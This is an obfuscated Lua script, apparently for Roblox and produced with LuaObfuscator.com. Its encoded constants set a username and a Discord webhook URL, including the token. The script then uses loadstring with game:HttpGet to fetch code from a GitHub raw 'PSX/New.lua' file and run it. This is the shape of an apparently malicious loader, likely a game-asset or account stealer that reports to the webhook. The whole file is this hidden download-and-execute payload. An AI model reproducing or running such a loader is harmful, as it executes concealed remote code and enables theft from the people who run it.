--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((942 -(144 + 51 + 745))^(v32-(1 + 0))))%(2^(((v33-(1 + 0)) -(v32-(1 + 0))) + 1));return v76-(v76%(1 + 0 + 0));else local v77=(1 + 1)^(v32-((1747 -(711 + 48)) -(681 + 306)));return (((v31%(v77 + v77))>=v77) and 1) or (0 -0);end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + (3 -1));v18=v18 + (3 -1);return (v40 * (908 -652)) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (700 -(530 + 167)));v18=v18 + 4;return (v44 * (25116014 -(8339843 -(1033 + 12)))) + (v43 * (231797 -166261)) + (v42 * (690 -((802 -380) + 12))) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1;local v48=(v20(v46,1 + (0 -0),1232 -(481 + 731)) * ((4 -2)^(57 -25))) + v45;local v49=v20(v46,100 -79,968 -(177 + 760));local v50=((v20(v46,32)==((18 + 183) -(119 + 81))) and  -(933 -(27 + 473 + 432))) or (1 + 0);if (v49==(369 -(147 + 222))) then if (v48==(1514 -(1252 + 262))) then return v50 * (0 -0);else v49=1 + 0;v47=0 + 0;end elseif (v49==(4536 -2489)) then return ((v48==(1323 -((2011 -(1493 + 212)) + 1017))) and (v50 * ((1 -0)/(0 + 0)))) or (v50 * NaN);end return v8(v50,v49-(908 + 115)) * (v47 + (v48/((2 -0)^(48 + 4))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==((3652 -(145 + 1807)) -(571 + 1129))) then return "";end end v51=v3(v16,v18,(v18 + v34) -(270 -(99 + 170)));v18=v18 + v34;local v52={};for v63=91 -((1854 -(712 + 1071)) + 19), #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1,v57 do local v66=v21();local v67;if (v66==(2 -1)) then v67=v21()~=0;elseif (v66==(2 + 0)) then v67=v24();elseif (v66==(650 -(432 + 215))) then v67=v25();end v58[v65]=v67;end v56[3]=v21();for v69=1,v23() do local v70=v21();if (v20(v70,1 + 0,1)~=0) then else local v83=v20(v70,799 -(307 + 490),5 -2);local v84=v20(v70,1950 -(715 + 1231),7 -1);local v85={v22(),v22(),nil,nil};if (v83==(692 -(360 + 332))) then v85[6 -3]=v22();v85[4]=v22();elseif (v83==(1 + 0)) then v85[6 -3]=v23();elseif (v83==(2 + 0)) then v85[3]=v23() -(2^16);elseif (v83==3) then v85[4 -1]=v23() -((2 + 0)^(1019 -(271 + 732)));v85[1358 -(586 + 768)]=v22();end if (v20(v84,1 + 0,1717 -(481 + 1235))==1) then v85[2]=v58[v85[2]];end if (v20(v84,2,5 -3)==1) then v85[1 + 2]=v58[v85[13 -10]];end if (v20(v84,3,256 -(230 + 23))==1) then v85[2 + 2]=v58[v85[13 -9]];end v53[v69]=v85;end end for v71=22 -(13 + 8),v23() do v54[v71-(1 -0)]=v28();end for v73=1,v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=0 -0,v81 do if ((v107>=v90) or (3424>=4881)) then v92[v107-v90]=v80[v107 + 1 + 0];else v94[v107]=v80[v107 + 1 + (1529 -(665 + 864))];end end local v95=(v81-v90) + (3 -(1875 -(1026 + 847)));local v96;local v97;while true do v96=v88[v78];v97=v96[1 -0];if ((v97<=(3 -0)) or ((339 + (2676 -(1176 + 738)))==(2729 + 253 + 187))) then if (((7325 -3218)==((15339 -10948) -(139 + 145))) and (v97<=(1 + 0))) then if (((3558 -(428 + 27))<=(5255 -(773 + 1219))) and (v97==(0 + 0 + 0))) then do return;end else local v118=v96[(658 -(62 + 595)) + 1];local v119,v120=v91(v94[v118](v13(v94,v118 + (3 -2),v96[8 -5])));v79=(v120 + v118) -(1744 -(1424 + 319));local v121=1318 -(492 + 47 + 779);for v132=v118,v79 do v121=v121 + (560 -(272 + 287));v94[v132]=v119[v121];end end elseif ((v97>(1398 -(264 + 1132))) or ((8 + 4542)==(51 + 58))) then v94[v96[2]]=v37[v96[3]];else local v124=v96[2 + 0];local v125=v94[v96[286 -(106 + 177)]];v94[v124 + (722 -(347 + 374))]=v125;v94[v124]=v125[v96[14 -10]];end elseif ((v97<=(6 -1)) or ((896 + 3540)<2037)) then if ((v97==(4 + 0)) or (1098>(2171 + 1304))) then v94[v96[1958 -(162 + 1794)]]=v96[3 + 0]~=(67 -(14 + 39 + 14));else v94[v96[2 -(0 -0)]]();end elseif (((7321 -(2299 + 1714))>3155) and (v97<=6)) then v94[v96[1 + 1]]=v96[2 + 1];elseif ((v97>(20 -13)) or ((1876 -(197 + 186))==((1560 + 1074) -(1244 + 355)))) then local v135=v96[2 -0];v94[v135]=v94[v135](v13(v94,v135 + 1,v79));else v37[v96[739 -(120 + (1471 -(427 + 428)))]]=v94[v96[2]];end v78=v78 + (1614 -(1184 + 429));end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D65030E3O006D61796265696D70726F312O323103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O363430323430383O3039322O3931332F7363777249676C4C46497A32735273346F33574C792D70317833767956584177384D6E324831354C44434A58527A746E4D345A63794449735F646D617756442O37676352030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F5053582F6D61696E2F4E65772E6C7561000D3O0012063O00023O0012073O00013O0012063O00043O0012073O00033O0012033O00053O001203000100063O002002000100010007001206000300084O0004000400014O0001000100044O00085O00022O00053O000100016O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
